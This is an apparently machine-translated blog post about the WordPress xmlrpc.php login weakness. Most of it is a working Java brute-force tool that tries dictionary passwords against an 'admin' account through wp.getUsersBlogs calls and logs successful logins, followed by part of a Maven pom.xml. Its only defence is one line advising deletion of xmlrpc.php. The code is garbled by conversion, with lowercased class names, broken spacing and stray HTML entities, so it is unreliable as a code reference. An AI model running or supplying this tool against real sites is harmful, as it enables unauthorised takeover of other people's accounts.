Wordpress xmlrpc.php brute force hack vulnerability

Source: Internet
Author: User

Wordpress xmlrpc.php brute force hack vulnerability

WordPress is a very popular open-source blogging platform. It offers a way to publish articles remotely, and the path used for that is the file xmlrpc.php. An xmlrpc vulnerability was recently disclosed: the principle is that authentication goes through XML-RPC, and even when that authentication fails, the attempt is not recorded by the security plug-ins installed on WordPress, so the rule "lock the account after n wrong passwords" is never triggered. As a result the login can be brute-forced, which is quite dangerous if the password is weak. The simplest fix is to delete the xmlrpc.php file. Having nothing better to do, I wrote a brute-force script in Java; all it does is take a set of usernames and passwords, call xmlrpc.php over and over, and check the authentication result — very simple. It is only for entertainment; brute-forcing is a sensitive matter, so everyone should be careful.

The Xmlrpc.java source code is as follows:

    package com.yeetrack.security.wordpress;    import  org.apache.http.client.clientprotocolexception;    import  org.apache.http.client.config.requestconfig;    import  org.apache.http.client.methods.closeablehttpresponse;    import  org.apache.http.client.methods.httpget;    import  org.apache.http.client.methods.httppost;    import  org.apache.http.entity.stringentity;    import  org.apache.http.impl.client.closeablehttpclient;    import  org.apache.http.impl.client.httpclients;    import org.apache.http.util.entityutils;     import org.slf4j.Logger;    import  org.slf4j.loggerfactory;    import org.testng.annotations.test;     import java.io.*;&nbsP;   /**     * created by victor wang on  2014/8/2.     *  exploit Wordpress xmlrpc vulnerability, brute force password       */    public class Xmlrpc    {         private String userAgent =  "mozilla/5.0  (windows nt  6.1; wow64; rv:31.0)  gecko/20100101 firefox/31.0 ";         requestconfig requestconfig = requestconfig.custom (). Setconnectionrequesttimeout (4000). Setconnecttimeout (4000)                  .setsockettimeout (4000). Build ();         private static logger logger = loggerfactory.getlogger (Xmlrpc.class );         privaTe closeablehttpclient httpclient = httpclients.custom ()                  .setuseragent (userAgent)                  .setdefaultrequestconfig ( Requestconfig)                  . 
Build ();        /**          *  Verify that the domain name exists xmlrpc.php this file          */         private boolean checkxmlrpcfile (String domain)          {            domain  = wrapperurl (domain);             if ( Domain==null)                 return false;             httpget get = new httpget (" HTTP//"+domain+"/xmlrpc.php ");             Get.addheader ("User-agent",  useragent);             CloseableHttpResponse response = null;             String resultString = null;             try {                 response = httpclient.execute (GET);                 if (null == response | |  response.equals (""))                      return  false;                 Resultstring = entityutils.tostring (Response.getentity ());             } catch  (ioexception e)  {                 e.printstacktrace ();             }             return resultstring.contains ("xml-rpc server accepts post requests  Only. ");         }        /**          *  Violent attempts           */         private boolean forcelogin (string username, string  password, string url)         {             //trying to sign in              httppost post = new httppost ("http://" +wrapperurl (URL) + "/xmlrpc.php");             post.addheader ("User-Agent",  useragent);            string xmlstring  =  "<?xml version=\" 1.0\ " encoding=\" iso-8859-1\ "?><methodcall>  < methodname>wp.getusersblogs</methodname>  <params>   <param>< Value> "+username+" </value></param>   <param><value> "+password+" </ Value></param>&nbSp; </params></methodcall> ";             StringEntity entity = null;             try {                 entity = new stringentity (xmlstring);                 post.setentity (Entity);                 closeablehttpresponse response  = httpclient.execute (POST);                 string loginresult = entityutils.tostring (Response.getEntity ());                 if (null==  loginresult | |  loginresult.Equals (""))                      return false;                 if (Loginresult.contains 
("ISAdmin"))  {                     logger.info (url +   "Login successful, Userename--->  + username + "   password---> " +  Password);                     return true;                 }            }  catch  (unsupportedencodingexception e)  {               &nbsP; e.printstacktrace ();            }  catch  (clientprotocolexception e)  {                 e.printstacktrace ();             } catch  (ioexception e)  {                 e.printstacktrace ();             }             return false;        }         /**         *  clean URL, remove HTTP///or End of path          */        private  String wrapperurl (String url)         {             if (null == url | |  url.equals (""))                  return null;            if ( Url.startswith ("http.//"))                  url = url.substring (7);             if (Url.contains ("/"))                  url = url.substring (0, url.indexof ("/"));             return url;        }         /**         *  hack          */          @Test         public void test ()          {             String url =  "http://somewordpress.com/xmlrpc.php";             if (!checkxmlrpcfile (URL))  {                 logger.info (url+ "---> No xmlrpc vulnerability");                 return;             }             file file = new file ("Src/main/resources/1pass00.txt");  //cipher dictionaries, a bunch of these online, Or you can build it yourself or   & it.nbsp;         try {                 FileReader fileReader = new  FileReader (file);                 bufferedreader bufferedreader = new bufferedreader (FileReader);                 String line =  null;                int  count = 1;                 while  ((Line = bufferedreader.readline ())  != null)  {                      System.out.println (""  + count +  "  "  + line);                     if (Forcelogin ("admin",  line, url))                           break;                     count++;                     //thread.sleep (+);                 }             } catch  (exception e)  { 
e.printstacktrace ();  }        }    }

The project is managed with Maven and uses Apache's httpclient and log4j; the pom.xml is as follows:

<?xml version="1.0" encoding="UTF-8"?> <project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd"> <modelVersion>4.0.0</modelVersion> <groupId>com.yeetrack.security</groupId> <artifactId>wordpress-xmlrpc</artifactId> <version>1.0-SNAPSHOT</version>
